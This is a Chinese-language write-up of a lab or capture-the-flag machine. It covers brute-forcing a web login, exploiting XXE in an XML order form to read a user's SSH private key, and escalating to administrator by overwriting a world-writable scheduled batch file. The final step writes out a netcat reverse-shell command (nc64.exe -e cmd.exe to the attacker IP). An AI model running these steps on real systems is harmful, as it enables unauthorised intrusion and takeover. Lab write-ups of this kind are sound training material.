XXE到提权 - 起始点

XXE到提权

1.简单爆破登陆页面

靶机地址：10.129.95.192 攻击机地址：10.10.14.38

Nmap扫描出来的结果是只开放了两个端口，80、443和22端口

并且系统是windows的

ssh直接放弃爆破hhh，访问web页面

发现是一个登陆的窗口，此时用burp爆破一下密码，后台挂着。

然后去网上搜一下是否有 Megacorp 相关的Nday可利用

然而并没有搜到什么有用的信息，但是burp传来了好消息

账户名：admin 密码：password

登陆成功，来到主页面

2.XXE到SSH连接

找到一处功能点，一处表单提交订购单子的地方，随便传点数据，抓包看看

发现是用xml进行传输的数据，那试想一下有没有可能存在xxe？

构造好payload之后发送，发现报错了，忘记了系统是windows的系统，这里确实存在xxe。

接下来再读一下windows的一些文件

注：这里只有将调用实体写在中间参数才有回显。

这样慢慢去找文件的话会消耗很长的时间，在html源码中，发现一个名叫daniel的修改了网页源代码

根据之前的经验，结合问题中有这么一项问题，有没有可能daniel是一个系统上的用户呢。

并且靶机开放了22号端口，daniel是否是通过ssh连接的呢，试着读取一下deniel用户的私钥

成功读取到daniel私钥

将私钥保存到本地(生成一个文件放入私钥，注意：文件权限需要改为只读)，然后使用ssh利用daniel的身份登陆靶机。

利用daniel的身份登录成功，第一个flag也已经拿到

3.提权

第二个flag需要提权之后才能拿到，whoami /all 可以看到当前权限并不高

来到C盘之后，看到文件中有一个Log-Management的文件夹，进入之后查看一下有什么东西

job.bat文件的内容是什么

job.bat文件中的内容应该是与清理日志有关，只能用管理员用户运行，并且提到了wevtutil.exe，这个程序可以检索出事件日志和发布者，并且可以安装和卸载事件清单等。

这个文件只能管理员运行，但是可以试试当前用户是否有权限对它进行修改：icacls job.bat

可以看到BUILTIN\USERS组全都可以控制文件

现在再看一下wevtutil是否在运行，可以通过命令schtasks查看当前计划任务，但是有可能因为权限不足而看不到完整的计划任务

靶机命令行进入powershell ps一下，可以看到 wevtutil有可能正在运行

那么可以将nc弄到靶机上面去，然后将脚本修改为执行一个反弹shell的命令。

用poershell下载通过攻击机临时起的http服务放好的nc保存到靶机上面

保存之后就可以开始修改job.bat文件了

echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat

同时攻击机监听1234端口，等待即可接受到shell

这里是因为有一个计划任务去执行job.bat文件所以当更改job.bat写入反弹shell内容之后才会反弹一个administrator的shell